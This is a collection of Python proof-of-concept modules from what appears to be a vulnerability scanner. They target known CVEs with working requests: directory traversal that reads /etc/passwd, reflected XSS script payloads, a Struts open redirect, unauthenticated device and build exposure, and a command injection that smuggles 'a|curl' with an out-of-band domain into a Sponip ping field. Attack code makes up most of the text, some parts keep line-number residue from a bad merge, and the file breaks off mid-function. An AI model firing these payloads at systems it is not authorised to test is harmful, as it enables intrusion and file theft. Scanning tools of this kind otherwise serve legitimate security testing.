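        "tags": ["cve", "cve2014", "lfi", "nodejs", "st"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Read /etc/passwd via percent-encoded ".." segments under /public/ (CVE-2014-3744).

    The /public/ mount is an assumption about how `st` is deployed; other mount
    points are not probed. Returns {"success": True, "info": info(), "payload":
    <request URL>} on a 200 containing "root:", otherwise {"success": False};
    transport errors count as a non-match. `except Exception` replaces the bare
    `except:` that also swallowed KeyboardInterrupt.
    """
    result = {"success": False}
    try:
        base = format_url(url)
        # Dots stay encoded: the bug is that `st` normalised the path before decoding.
        path = '/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        target = base + path
        resp = requests.get(target, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result.update({"success": True, "info": info(), "payload": target})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/cves/2015/CVE-2015-2067.py ====
import requests


# Vuln Base Info
def info():
    """Static metadata for the CVE-2015-2067 (Magento MAGMI plugin directory traversal) check."""
    return {
        "author": "cckuailong",
        "name": '''Magento Server Magmi Plugin - Directory Traversal''',
        "description": '''Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. '''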
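# -- CVE-2015-2067.py, continued from the previous line: description tail, rest of info() --
            '''(dot dot) in the file parameter.''',
        "severity": "high",
        "references": [
            "https://www.exploit-db.com/exploits/35996",
            "https://nvd.nist.gov/vuln/detail/CVE-2015-2067"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            # Was "": the identifier is in the references and tags, so record it here too.
            "cve-id": "CVE-2015-2067",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2015", "lfi", "magento", "magmi", "plugin"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Read /etc/passwd through the `file` parameter of ajax_pluginconf.php (CVE-2015-2067).

    Returns {"success": True, "info": info(), "payload": <request URL>} on a 200
    containing "root:", otherwise {"success": False}; transport errors count as a
    non-match. `except Exception` replaces the bare `except:` that also swallowed
    KeyboardInterrupt.
    """
    result = {"success": False}
    try:
        base = format_url(url)
        path = '/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility'
        target = base + path
        resp = requests.get(target, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result.update({"success": True, "info": info(), "payload": target})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/cves/2022/CVE-2022-0432.py ====
import requests


# Vuln Base Info
def info():
    """Static metadata for the CVE-2022-0432 (Mastodon embed.js prototype pollution) check."""
    return {
        "author": "cckuailong",
        "name": '''Mastodon Prototype Pollution Vulnerability''',
        "description": '''The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability.''',
        "severity": "medium",
        "references": [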
"https://github.com/mastodon/mastodon/commit/4d6d4b43c6186a13e67b92eaf70fe1b70ea24a09", 13 | "https://drive.google.com/file/d/1vpZ0CcmFhTEUasLTPUBf8o-4l7G6ojtG/view", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2022-0432" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 18 | "cvss-score": "6.1", 19 | "cve-id": "CVE-2022-0432", 20 | "cwe-id": "CWE-1321" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2022", "mastodon", "prototype"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/embed.js' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "if (data.type !== 'setHeight' || !iframes[data.id]) {" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2013/CVE-2013-2248.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | 4 | 5 | # Vuln Base Info 6 | def info(): 7 | return { 8 | "author": "cckuailong", 9 | "name": '''Apache Struts - Multiple Open Redirection Vulnerabilities''', 10 | "description": '''Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.''', 11 | "severity": "low", 
12 | "references": [ 13 | "https://www.exploit-db.com/exploits/38666", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2013-2248", 15 | "https://cwiki.apache.org/confluence/display/WW/S2-017" 16 | ], 17 | "classification": { 18 | "cvss-metrics": "", 19 | "cvss-score": "", 20 | "cve-id": "CVE-2013-2248", 21 | "cwe-id": "" 22 | }, 23 | "metadata":{ 24 | "vuln-target": "", 25 | 26 | }, 27 | "tags": ["cve", "cve2013", "apache", "redirect", "struts"], 28 | } 29 | 30 | 31 | # Vender Fingerprint 32 | def fingerprint(url): 33 | return True 34 | 35 | # Proof of Concept 36 | def poc(url): 37 | result = {} 38 | try: 39 | url = format_url(url) 40 | path = '/index.action?redirect:http://www.example.com/' 41 | 42 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 43 | if re.search(r'(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$', resp.text): 44 | result["success"] = True 45 | result["info"] = info() 46 | result["payload"] = url+path 47 | 48 | except: 49 | result["success"] = False 50 | 51 | return result 52 | 53 | 54 | # Exploit, can be same with poc() 55 | def exp(url): 56 | return poc(url) 57 | 58 | 59 | # Utils 60 | def format_url(url): 61 | url = url.strip() 62 | if not ( url.startswith('http://') or url.startswith('https://') ): 63 | url = 'http://' + url 64 | url = url.rstrip('/') 65 | 66 | return url -------------------------------------------------------------------------------- /modules/cves/2013/CVE-2013-3526.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting''', 9 | "description": '''A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the 
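# -- CVE-2013-3526.py, continued from the previous line: description tail, rest of info() --
            '''aoid parameter."''',
        "severity": "medium",
        "references": [
            "https://nvd.nist.gov/vuln/detail/CVE-2013-3526"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2013-3526",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2013", "wordpress", "xss", "wp-plugin"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Reflect a script tag through the `aoid` parameter of ta_loaded.js.php (CVE-2013-3526).

    Returns {"success": True, "info": info(), "payload": <request URL>} when the
    injected tag comes back unescaped in an HTML response, otherwise
    {"success": False}; transport errors count as a non-match.

    The matcher used to test `"" in resp.text`, which is always true, so every
    200 HTML response was flagged; it now requires the decoded payload.
    `except Exception` replaces the bare `except:` that also swallowed KeyboardInterrupt.
    """
    result = {"success": False}
    try:
        base = format_url(url)
        path = '/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
        target = base + path
        resp = requests.get(target, timeout=10, verify=False, allow_redirects=False)
        marker = "<script>alert(1)</script>"
        if resp.status_code == 200 and "text/html" in str(resp.headers) and marker in resp.text:
            result.update({"success": True, "info": info(), "payload": target})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/cves/2015/CVE-2015-1880.py ====
import requests


# Vuln Base Info
def info():
    """Static metadata for the CVE-2015-1880 (FortiOS SSL-VPN login page XSS) check."""
    return {
        "author": "cckuailong",
        "name": '''XSS in Fortigates SSL VPN login page''',
        "description": '''Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.''',
        "severity": "medium",
        "references": [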
"https://nvd.nist.gov/vuln/detail/CVE-2015-1880", 13 | "https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "xss", "fortigates", "ssl"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = "/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en" 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-5111.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Fonality trixbox - Directory Traversal''', 9 | "description": '''Multiple directory traversal vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. 
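# -- CVE-2014-5111.py, continued from the previous line: description tail, rest of info() --
            '''(dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.''',
        "severity": "high",
        "references": [
            "https://www.exploit-db.com/exploits/39351",
            "https://nvd.nist.gov/vuln/detail/CVE-2014-5111"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "CVE-2014-5111",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2014", "lfi", "trixbox"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Read /etc/passwd through the `lang` parameter of endpointcfg.php (CVE-2014-5111).

    Only vector (4) from the description is exercised. Returns {"success": True,
    "info": info(), "payload": <request URL>} on a 200 containing "root:",
    otherwise {"success": False}; transport errors count as a non-match.
    `except Exception` replaces the bare `except:` that also swallowed KeyboardInterrupt.
    """
    result = {"success": False}
    try:
        base = format_url(url)
        # Trailing %00 truncates the language-file suffix (old-PHP null-byte behaviour).
        path = '/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00'
        target = base + path
        resp = requests.get(target, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "root:" in resp.text:
            result.update({"success": True, "info": info(), "payload": target})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/vulnerabilities/other/huawei-router-auth-bypass.py ====
import requests


# Vuln Base Info
def info():
    """Static metadata for the Huawei router unauthenticated device-info exposure check."""
    return {
        "author": "cckuailong",
        "name": '''Huawei Router Authentication Bypass''',
        "description": '''The default password of this router is the last 8 characters of the device's serial number which exist in the back of '''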
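# -- huawei-router-auth-bypass.py, continued from the previous line: description tail, rest of info() --
            '''the device.''',
        "severity": "critical",
        "references": [
            "https://www.exploit-db.com/exploits/48310"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["huawei", "auth-bypass", "router"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Stub: no product fingerprint is implemented, so every target is probed."""
    return True


# Proof of Concept
def poc(url):
    """Check whether /api/system/deviceinfo is readable without authentication.

    The check itself only confirms that DeviceName, SerialNumber and
    HardwareVersion are exposed; it does not log in. The "auth bypass" in the
    module name rests on the description's claim that the default admin
    password is derived from the serial number. Returns {"success": True,
    "info": info(), "payload": <request URL>} on a match, otherwise
    {"success": False}; transport errors count as a non-match.
    `except Exception` replaces the bare `except:` that also swallowed KeyboardInterrupt.
    """
    result = {"success": False}
    try:
        base = format_url(url)
        path = """/api/system/deviceinfo"""
        method = "GET"
        headers = {'Accept': 'application/json, text/javascript, */*; q=0.01'}
        # The unused empty `data` body of the original GET has been dropped.
        resp0 = requests.request(method=method, url=base + path, headers=headers, timeout=10, verify=False, allow_redirects=False)
        leaked = all(field in resp0.text for field in ("""DeviceName""", """SerialNumber""", """HardwareVersion"""))
        if resp0.status_code == 200 and leaked:
            result.update({"success": True, "info": info(), "payload": base + path})
    except Exception:
        result["success"] = False
    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploitation is identical to the proof of concept for this module."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: strip whitespace, default to http://, drop trailing slashes."""
    target = url.strip()
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
    return target.rstrip('/')


# ==== /modules/vulnerabilities/other/jfrog-unauth-build-exposed.py ====
import requests


# Vuln Base Info
def info():
    """Static metadata for the JFrog unauthenticated build-search exposure check."""
    return {
        "author": "cckuailong",
        "name": '''JFrog Unauthentication Builds''',
        "description": '''''',
        "severity": "medium",
        "references": [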
"https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["jfrog"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/ui/api/v1/global-search/builds?jfLoader=true""" 39 | method = "POST" 40 | data = {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100} 41 | headers = {'Content-Type': 'application/json'} 42 | resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""last_build_number""" in resp0.text and """build_name""" in resp0.text) and ("""application/json""" in str(resp0.headers)) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/sponip-network-system-ping-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Sponip Network System Ping RCE''', 11 | "description": '''''', 12 | 
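"severity": "critical",
        "references": [
            "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["sponip", "rce", "oast", "network"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook; no check is implemented, every target is accepted."""
    return True


# Proof of Concept
def poc(url):
    """Probe /php/ping.php for OS command injection, confirmed out-of-band.

    A shell metacharacter is injected into the ping target so that the injected
    ``curl`` resolves a per-run OAST domain; the verdict comes solely from
    ``verify_request`` observing that DNS lookup, never from the HTTP response.

    Args:
        url: target base URL; ``format_url`` prepends ``http://`` if no scheme.

    Returns:
        dict with ``success`` always present; on a confirmed callback also
        ``info`` (vuln metadata) and ``payload`` (the requested URL).
    """
    result = {"success": False}  # a verdict is always present, also on a silent miss
    try:
        url = format_url(url)

        oob_domain, flag = gen_oob_domain()

        path = """/php/ping.php"""
        method = "POST"
        # NOTE(review): the first field is spelled ``sondata[ip]`` while the second is
        # ``jsondata[type]``; this looks like a typo for ``jsondata[ip]`` -- confirm against
        # the reference before trusting a negative result from this module.
        data = """sondata[ip]=a|curl {oob_domain}&jsondata[type]=1""".format(oob_domain=oob_domain)
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        # TLS verification is intentionally off: scan targets are commonly self-signed.
        # The response body is irrelevant here, only the OAST callback counts.
        requests.request(method=method, url=url + path, data=data, headers=headers,
                         timeout=10, verify=False, allow_redirects=False)

        if verify_request(type="dns", flag=flag):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path

    except Exception:
        # Network/OAST errors are reported as "not vulnerable"; KeyboardInterrupt is
        # deliberately not swallowed so a scan can still be aborted.
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to ``poc`` (callback proof only, no shell)."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: trim whitespace, default to http://, drop trailing slashes."""
    url = url.strip()
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    url = url.rstrip('/')

    return url
# --------------------------------------------------------------------------------
# /modules/cves/2014/CVE-2014-9094.py:
# --------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting''',
        "description": '''Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in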
the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-9094" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2014-9094", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2014", "wordpress", "xss", "wp-plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-4414.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal''', 9 | "description": '''Directory traversal vulnerability in download_audio.php in the SE 
HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/37274", 13 | "https://www.cvedetails.com/cve/CVE-2015-4414" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "lfi"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "root:" in resp.text: 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/thruk-xss.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Thruk Monitoring Webinterface - XSS''', 9 | "description": '''''', 10 | "severity": "medium", 11 | "references": [ 12 | 
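"https://www.thruk.org/download.html"
        ],
        "classification": {
            "cvss-metrics": "",
            "cvss-score": "",
            "cve-id": "",
            "cwe-id": ""
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["xss", "thruk"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook; no check is implemented, every target is accepted."""
    return True


# Proof of Concept
def poc(url):
    """Check the Thruk login form for reflected XSS in the ``login`` field.

    Posts a login attempt whose username closes the surrounding script block and
    injects ``<script>alert(document.domain)</script>``; the target is flagged
    when that tag comes back verbatim in a 200 text/html response.

    Args:
        url: target base URL; ``format_url`` prepends ``http://`` if no scheme.

    Returns:
        dict with ``success`` always present; on a hit also ``info`` and ``payload``.
    """
    result = {"success": False}  # a verdict is always present, also on a miss
    try:
        url = format_url(url)

        path = """/thruk/cgi-bin/login.cgi"""
        method = "POST"
        data = """referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface"""
        # The Referer must point at the target itself: the original value was the
        # literal template placeholder "{{Hostname}}", which was never substituted.
        headers = {'Content-Type': 'application/x-www-form-urlencoded',
                   'Referer': url + '/thruk/cgi-bin/login.cgi?thruk'}
        # TLS verification is intentionally off: scan targets are commonly self-signed.
        resp0 = requests.request(method=method, url=url + path, data=data, headers=headers,
                                 timeout=10, verify=False, allow_redirects=False)

        # NOTE(review): the needle in this listing was an empty string, which matches every
        # 200 text/html page. It is rebuilt here from the injected payload (the decoded
        # ``login`` value) so only an unencoded reflection counts; confirm against upstream.
        marker = "<script>alert(document.domain)</script>"
        if (resp0.status_code == 200) and (marker in resp0.text) and ("""text/html""" in str(resp0.headers)):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path

    except Exception:
        # Network errors are reported as "not vulnerable"; KeyboardInterrupt still propagates.
        result["success"] = False

    return result


# Exploit, can be same with poc()
def exp(url):
    """Exploit entry point; identical to ``poc``."""
    return poc(url)


# Utils
def format_url(url):
    """Normalise a target: trim whitespace, default to http://, drop trailing slashes."""
    url = url.strip()
    if not url.startswith(('http://', 'https://')):
        url = 'http://' + url
    url = url.rstrip('/')

    return url
# --------------------------------------------------------------------------------
# /modules/cves/2013/CVE-2013-2287.py:
# --------------------------------------------------------------------------------
import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting''',
        "description": '''Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader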
plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2013-2287" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2013-2287", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2013", "wordpress", "xss", "wp-plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | path = '/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 38 | 39 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 40 | if resp.status_code == 200 and "text/html" in str(resp.headers) and "" in resp.text: 41 | result["success"] = True 42 | result["info"] = info() 43 | result["payload"] = url+path 44 | 45 | except: 46 | result["success"] = False 47 | 48 | return result 49 | 50 | 51 | # Exploit, can be same with poc() 52 | def exp(url): 53 | return poc(url) 54 | 55 | 56 | # Utils 57 | def format_url(url): 58 | url = url.strip() 59 | if not ( url.startswith('http://') or url.startswith('https://') ): 60 | url = 'http://' + url 61 | url = url.rstrip('/') 62 | 63 | return url -------------------------------------------------------------------------------- /modules/cves/2019/CVE-2019-17538.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Jnoj arbitrary local file inclusion (LFI)''', 9 | "description": '''Jiangnan Online Judge (aka jnoj) 0.8.0 has directory traversal (LFI) vulnerability via 
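web/polygon/problem/viewfile?id=1&name=../''',
        "severity": "high",
        "references": [
            "https://github.com/shi-yang/jnoj/issues/53"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "cvss-score": "",
            "cve-id": "CVE-2019-17538",
            "cwe-id": "CWE-22"
        },
        "metadata": {
            "vuln-target": "",
        },
        "tags": ["cve", "cve2019", "jnoj", "lfi"],
    }


# Vendor Fingerprint
def fingerprint(url):
    """Vendor fingerprint hook; no check is implemented, every target is accepted."""
    return True


# Proof of Concept
def poc(url):
    """Read /etc/passwd through the jnoj ``viewfile`` path traversal (CVE-2019-17538).

    Args:
        url: target base URL; ``format_url`` prepends ``http://`` if no scheme.

    Returns:
        dict with ``success`` always present; on a hit also ``info`` and ``payload``.
    """
    # Function-scope import: this module only imports ``requests`` at file level, so the
    # ``re.search`` below raised NameError and the bare except silently reported
    # "not vulnerable" for every target.
    import re

    result = {"success": False}  # a verdict is always present, also on a miss
    try:
        url = format_url(url)

        path = """/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd"""
        method = "GET"
        data = """"""
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        # TLS verification is intentionally off: scan targets are commonly self-signed.
        resp0 = requests.request(method=method, url=url + path, data=data, headers=headers,
                                 timeout=10, verify=False, allow_redirects=False)

        # A root passwd entry is the only accepted proof; a bare "root:" would also
        # match error pages that merely echo the requested name.
        if (resp0.status_code == 200) and (re.search(r"""root:.*:0:0:""", resp0.text)):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path

    except Exception:
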